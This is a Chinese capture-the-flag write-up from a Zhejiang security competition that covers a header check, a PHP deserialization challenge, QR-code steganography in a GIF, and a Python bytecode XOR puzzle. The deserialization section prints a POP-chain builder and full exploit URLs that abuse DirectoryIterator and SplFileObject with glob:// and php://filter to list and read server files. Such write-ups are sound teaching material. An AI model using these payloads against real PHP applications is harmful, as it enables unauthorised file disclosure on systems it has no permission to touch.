^

浙江省第四届网络与信息安全竞赛初赛WP

最后一次参加CTF了,希望决赛能拿一等吧。


Checkin

打开网站 network看请求头

6178e89cdbccd.png

Pppop

代码审计 发现a8类实例化时候的类名可控 类参数可控

6178e8e10e40c.png

审计pop链触发到a8类的hack4fun方法 再用原生类做列目录和文件读取即可

<?php
class A1{
    public $tmp1;
    public $tmp2;
    public function __construct($tmp1){
        $this->tmp1 = $tmp1;
    }
}
class A3
{
    public $tmp1;
    public $tmp2;
    public function __construct($tmp2){
        $this->tmp2 = $tmp2;
    }
}
class A4
{
    public $tmp1='1919810';
    public $tmp2;
    public function __construct($tmp1)
    {
        $this->tmp1 = $tmp1;
    }
}
class A5
{
    public $tmp1;
    public $tmp2;
    public function __call($a,$b)
    {
        $f=$this->tmp1;
        $f();
    }
}
class A6
{
    public $tmp1;
    public $tmp2;
    public function __construct($tmp1)
    {
        $this->tmp1 = $tmp1;
    }
}
class A8
{
    public $tmp1;
    public $tmp2;
}
$A6 = new A6(new A8());
$A4 = new A4($A6);
$A3 = new A3($A4);
$A1 = new A1($A3);

echo serialize($A1);

接下里就是构造原生类来触发列目录与文件读取的操作即可

1.DirectoryIterator 使用 glob 协议列当前目录下所有文件

http://90d2487c-1f6a-4802-8403-f52aee1e8b78.zj-ctf.dasctf.com/?DASCTF
=O:2:%22A1%22:2:{s:4:%22tmp1%22;O:2:%22A3%22:2:{s:4:%22tmp1%22;N;s:4:
%22tmp2%22;O:2:%22A4%22:2:{s:4:%22tmp1%22;O:2:%22A6%22:2:{s:4:%22tmp1
%22;O:2:%22A8%22:2:{s:4:%22tmp1%22;N;s:4:%22tmp2%22;N;}s:4:%22tmp2%22;
N;}s:4:%22tmp2%22;N;}}s:4:%22tmp2%22;N;}&DAS=DirectoryIterator&CTF=gl
ob://*		

已开始用的是glob:///* 在/目录下找 没找到

最后居然是在当前目录下 有一个flag文件

6178e99abb14d.png

2.用 php 伪协议和 splfileobject 函数读取文件

http://9e10e67a-cf65-44f8-ae9b-b84c825f304b.zj-ctf.dasctf.com/?DASCTF=O:2:%22A1%22:2:{s:4:%22tmp1%22;O:2:%22A3%22:2:{s:4:%22tmp1%22;N;s:4:%22tmp2%22;O:2:%22A4%22:2:{s:4:%22tmp1%22;O:2:%22A6%22:2:{s:4:%22tmp1%22;O:2:%22A8%22:2:{s:4:%22tmp1%22;N;s:4:%22tmp2%22;N;}s:4:%22tmp2%22;N;}s:4:%22tmp2%22;N;}}s:4:%22tmp2%22;N;}&DAS=SplFileObject&CTF=php://filter/read=convert.base64-encode/resource=flaggggggggggg.php

6178e9fdae8b6.png

Qrimg

给了一个gif文件 用软件分离成若干个bmp文件

6178eaa424582.png

stegsolve发现每一个bmp存在二维码

6178eac007176.png
写个脚本提取一下

from PIL import Image
import os
import zxing
import sys

					
gifdemo = Image.open("./images/IMG00000.bmp")
gifres = Image.new("RGB",(gifdemo.width,gifdemo.height))
gifs = sorted((fn for fn in os.listdir('./images')))

					
i=0
for f in gifs:				
    imgcount = len(gifs)
    sys.stdout.write(str(i)+'/311'+"\\r")
    sys.stdout.flush()
    im = Image.open("./images/"+f)
    for x in range(im.width):
        for y in range(im.height):
            (r,g,b)=im.getpixel((x,y))
            if b&1 == 1:
                n = 255
            else:
                n=0
            gifres.putpixel((x,y),(n,n,n))
    gifres.save("./codes/"+str(i).zfill(4)+".png")
    i = i+1			
print("提取完成")		

提取完再批量扫一下

from PIL import Image
import os
import zxing
import sys

					
files=sorted((codefile for codefile in os.listdir('./codes') if codefile.endswith('.png')))
res=""
readers = zxing.BarCodeReader()
i=0

					
for f in files:
    text = ""
    try:
        text = readers.decode("./codes/"+f).parsed
        if not text:
            print(res)
            res = ""
            print("无法识别此文件,请用软件识别:"+f)
        res += text
    except:
        pass
    i = i+1
    sys.stdout.write('当前字符:'+text+"\\r")
    sys.stdout.flush()			
print(res)

有三个识别为Y的没识别出来 补上去就好

Crackpyc

6178ec050982f.png

逆向字节码

s=
[108,17,42,226,158,180,96,115,64,24,38,236,179,173,34,22,81,113,38,215,165,135,68,7,119,97,
45,254,250,172,43,62]
key = []
flag = ''

					
num = 0
for i in range(8):
    num = (num-7508399208111569251)%4294967295
    key.append((num >> 24) & 0xff)					
for i in range(32):
    flag += chr(key[i%len(key)] ^ s[i])					
print(flag)		


最终第十名

6178ec8a64df5.png